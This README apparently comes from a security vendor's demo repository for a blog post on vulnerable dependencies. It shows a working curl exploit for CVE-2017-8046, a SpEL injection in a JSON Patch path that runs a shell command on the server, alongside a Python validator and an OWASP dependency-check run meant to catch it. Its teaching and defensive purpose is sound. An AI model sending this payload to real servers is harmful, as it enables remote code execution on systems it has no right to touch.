DISCLAIMER: This repository is supplementary to the VGS blog post, How to Avoid "Using Components with Known Vulnerabilities". It contains an application with a known security vulnerability (namely, CVE-2017-8046), as well as the description of how to exploit it. Use the application at your own risk!
First, start the application by executing the following command from the root of the repository:
```sh
mvn clean spring-boot:run
```

Second, create a resource by sending a POST request like this:

```sh
curl -X POST http://localhost:8080/books \
-H 'Content-Type: application/json' \
-d '{"isbn":"978-3827268969","title":"Thinking in Java","author":"Bruce Eckel"}'
```

Third, send a PATCH request whose `path` is a SpEL expression:

```sh
curl -X PATCH http://localhost:8080/books/1 -H 'Content-Type: application/json-patch+json' -d '[{"op":"replace","path":"T(org.springframework.util.StreamUtils).copy(T(java.lang.Runtime).getRuntime().exec(\"ifconfig\").getInputStream(),T(org.springframework.web.context.request.RequestContextHolder).currentRequestAttributes().getResponse().getOutputStream()).x","value":"Your application has been hacked"}]'
```

Provided you're running the application on a Unix-based operating system (e.g. macOS), the response will contain the host's network configuration. In fact, any SpEL expression can be used.
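A request-level check that catches the payload above, as an added example that is not part of this repository: every `path` (and `from`) in an RFC 6902 JSON Patch must be a JSON Pointer (RFC 6901), and the SpEL expression used against CVE-2017-8046 is not one, so a purely syntactic validator in front of the application rejects it. The real fix is upgrading the vulnerable dependencies that the dependency check reports; the function name `find_patch_violations` and the sample bodies are constructed for this example.

```python
"""Reject JSON Patch bodies whose "path"/"from" fields are not JSON Pointers.

Spring Data REST (CVE-2017-8046) evaluated the "path" of a PATCH operation as
a SpEL expression. A well-formed JSON Pointer is "" or "/"-prefixed tokens in
which "~" only appears as the escapes "~0" and "~1", so the exploit path from
the README above fails this check without any attempt to parse SpEL itself.
"""
import json
import re

_POINTER_RE = re.compile(r"^(?:/(?:[^/~]|~[01])*)*$")   # RFC 6901 syntax
_ALLOWED_OPS = {"add", "remove", "replace", "move", "copy", "test"}

# Constructed sample bodies: a legitimate patch and the README's exploit.
BENIGN_PATCH = '[{"op":"replace","path":"/title","value":"Thinking in Java, 4th ed."}]'
EXPLOIT_PATCH = (
    r'[{"op":"replace","path":"T(org.springframework.util.StreamUtils).copy('
    r'T(java.lang.Runtime).getRuntime().exec(\"ifconfig\").getInputStream(),'
    r'T(org.springframework.web.context.request.RequestContextHolder)'
    r'.currentRequestAttributes().getResponse().getOutputStream()).x",'
    r'"value":"Your application has been hacked"}]'
)


def find_patch_violations(body: str) -> list[str]:
    """Return human-readable problems with a JSON Patch body; [] means accept."""
    try:
        patch = json.loads(body)
    except ValueError as exc:
        return [f"body is not JSON: {exc}"]
    if not isinstance(patch, list):
        return ["JSON Patch body must be an array of operations"]
    problems = []
    for i, op in enumerate(patch):
        if not isinstance(op, dict):
            problems.append(f"op {i}: not an object")
            continue
        if op.get("op") not in _ALLOWED_OPS:
            problems.append(f"op {i}: unknown op {op.get('op')!r}")
        if "path" not in op:
            problems.append(f"op {i}: missing 'path'")
        for key in ("path", "from"):          # "from" is used by move/copy
            if key in op:
                value = op[key]
                if not isinstance(value, str) or not _POINTER_RE.fullmatch(value):
                    problems.append(f"op {i}: {key!r} is not a JSON Pointer: {value!r}")
    return problems


if __name__ == "__main__":
    for label, body in (("benign", BENIGN_PATCH), ("exploit", EXPLOIT_PATCH)):
        print(label, "->", find_patch_violations(body) or "accepted")
```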
To detect the vulnerable dependencies with the OWASP dependency-check Maven plugin (`org.owasp:dependency-check-maven`) configured in this build, run:

```sh
mvn clean package verify
```

The build fails because dependencies with high-risk vulnerabilities (CVSS score of 7.0 or higher) are identified:

```
[ERROR] Failed to execute goal org.owasp:dependency-check-maven:3.3.2:check (default) on project CVE-2017-8046:
[ERROR]
[ERROR] One or more dependencies were identified with vulnerabilities that have a CVSS score greater than or equal to '7.0':
[ERROR]
[ERROR] spring-boot-1.5.5.RELEASE.jar: CVE-2017-8046
[ERROR] spring-core-4.3.10.RELEASE.jar: CVE-2018-1275, CVE-2018-1270
[ERROR] jackson-databind-2.8.9.jar: CVE-2017-15095, CVE-2017-17485, CVE-2018-7489
[ERROR] spring-boot-starter-data-rest-1.5.5.RELEASE.jar: CVE-2018-1273, CVE-2017-8046
[ERROR]
[ERROR] See the dependency-check report for more details.
```
Want to just jump right in? Check out our getting started guide.
Very Good Security (VGS) allows you to enhance your security standing while maintaining the utility of your data internally and with third-parties. As an added benefit, we accelerate your compliance certification process and help you quickly obtain security-related compliances that stand between you and your market opportunities.
To learn more, visit us at https://www.verygoodsecurity.com/
This project is licensed under the MIT license. See the LICENSE file for details.